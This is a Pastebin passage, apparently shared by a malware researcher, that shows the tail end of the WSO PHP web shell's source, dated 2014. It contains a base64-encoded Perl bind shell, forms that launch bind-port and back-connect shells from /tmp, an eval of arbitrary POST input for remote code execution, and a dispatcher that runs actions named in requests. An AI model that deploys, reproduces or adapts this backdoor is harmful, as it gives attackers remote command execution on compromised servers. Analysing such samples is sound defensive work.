  1857.     $bind_port_p    = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1858.     echo "<h1>Network tools</h1><div class=content>
  1859.         <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
  1860.         <span>Bind port to /bin/sh [perl]</span><br/>
  1861.         Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
  1862.         </form>
  1863.         <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
  1864.         <span>Back-connect  [perl]</span><br/>
  1865.         Server: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
  1866.         </form><br>";
  1867.     if (isset($_POST['p1'])) {
  1868.         function cf($f, $t)
  1869.         {
  1870.             $w = @fopen($f, "w") or @function_exists('file_put_contents');
  1871.             if ($w) {
  1872.                 @fwrite($w, @base64_decode($t));
  1873.                 @fclose($w);
  1874.             }
  1875.         }
  1876.         if ($_POST['p1'] == 'bpp') {
  1877.             cf("/tmp/bp.pl", $bind_port_p);
  1878.             $out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &");
  1879.             echo "<pre class=ml1>$out\n" . wsoEx("ps aux | grep bp.pl") . "</pre>";
  1880.             unlink("/tmp/bp.pl");
  1881.         }
  1882.         if ($_POST['p1'] == 'bcp') {
  1883.             cf("/tmp/bc.pl", $back_connect_p);
  1884.             $out = wsoEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
  1885.             echo "<pre class=ml1>$out\n" . wsoEx("ps aux | grep bc.pl") . "</pre>";
  1886.             unlink("/tmp/bc.pl");
  1887.         }
  1888.     }
  1889.     echo '</div>';
  1890.     wsoFooter();
  1891. }
  1892. function actionRC()
  1893. {
  1894.     if (!@$_POST['p1']) {
  1895.         $a = array(
  1896.             "uname" => php_uname(),
  1897.             "php_version" => phpversion(),
  1898.             "wso_version" => WSO_VERSION,
  1899.             "safemode" => @ini_get('safe_mode')
  1900.         );
  1901.         echo serialize($a);
  1902.     } else {
  1903.         eval($_POST['p1']);
  1904.     }
  1905. }
  1906. if (empty($_POST['a']))
  1907.     if (isset($default_action) && function_exists('action' . $default_action))
  1908.         $_POST['a'] = $default_action;
  1909.     else
  1910.         $_POST['a'] = 'SecInfo';
  1911. if (!empty($_POST['a']) && function_exists('action' . $_POST['a']))
  1912.     call_user_func('action' . $_POST['a']);
  1913. exit;
  1914. ?>
  1915.  
  1916. #============
  1917. #MalwareMustDie!
  1918. @unixfreaxjp /malware/temp/001]$ date
  1919. Sun Sep  7 02:21:57 JST 2014
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top